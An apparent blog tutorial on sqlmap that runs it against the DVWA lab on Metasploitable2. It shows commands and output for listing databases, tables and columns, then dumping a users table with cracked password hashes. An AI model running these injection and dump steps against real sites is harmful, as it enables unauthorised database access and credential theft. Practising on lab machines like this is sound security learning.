What is sqlmap?

SQLmap is a free and opensource tool that is use to detect and exploit database susceptibilities. It is very famous & widely use tool for sql injection. This is command line tool & available for Linux, windows and Mac operating system. Atmost sqlmap has full supports for multiple DBMS including Oracle, MySQL, MS SQL Server, PostgreSQL, SAP MaxDB etc. Also full supports for all injection techniques.

Demo of SQLmap.

For demo session I am using a database vulnerable machine which is available on vulnhub. It is also very easy to use and user friendly.

Note:-

Default user name of dvwa is:- admin
Password is:- password
[email protected]:~# sqlmap
sqlmap
[email protected]:~# sqlmap -u "http://192.168.136.153/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"

Additional values can be combined:

1. – -dbs: It will display all the databases
2. – -tables: It will display all the tables
3. – -columns: It will display all the columns
4. – -dump: It will dump entries.

Above all things is about sql injection. As a result you can see in figure above. This command has one argument that is -u, is use to specify the url. Also we can use Additional values after the url. Sometimes we have to specify the cookies of the site with it.

[email protected]:~# sqlmap -u "http://192.168.136.153/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --dbs

Finally we got some databases. In above command we used –dbs argument which is use to specify the database & as a result we can see we have the database lists. There are 7 databases available which are:-

  1. dvwa
  2. information_schema
  3. metasploit
  4. mysql
  5. owasp10
  6. tikiwiki
  7. tikiwiki195

Metasploitable2 has contain above all the databases. Similarly we can use –tables options with respect to any database. 

[email protected]:~# sqlmap -u "http://192.168.136.153/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa --tables;
[03:06:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[03:06:54] [INFO] fetching tables for database: 'dvwa'
[03:06:54] [INFO] used SQL query returns 2 entries
[03:06:54] [INFO] resumed: guestbook
[03:06:54] [INFO] resumed: users
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+

As a result of this command we can see there are two table. first table name is guestbook. Another one is users. So we can use and enumerate both.

[email protected]:~# sqlmap -u "http://192.168.136.153/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa -T users --columns;

Similarly add –columns options with select the table name. -T is use to specify the table. As a result we can see in image below. Here we have 6 columns.

[email protected]:~# sqlmap -u "http://192.168.136.153/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa -T users -C first_name,password,user --dump;

Database: dvwa
Table: users
[5 entries]
+---------+------------+---------------------------------------------+
| user | first_name | password |
+---------+------------+---------------------------------------------+
| 1337 | Hack | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| admin | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| gordonb | Gordon | e99a18c428cb38d5f260853678922e03 (abc123) |
| pablo | Pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| smithy | Bob | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+------------+---------------------------------------------+

Finally we got the result as we can see in above image. There are 5 uses in this table. Similarly we can do with another tables and databases.


Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: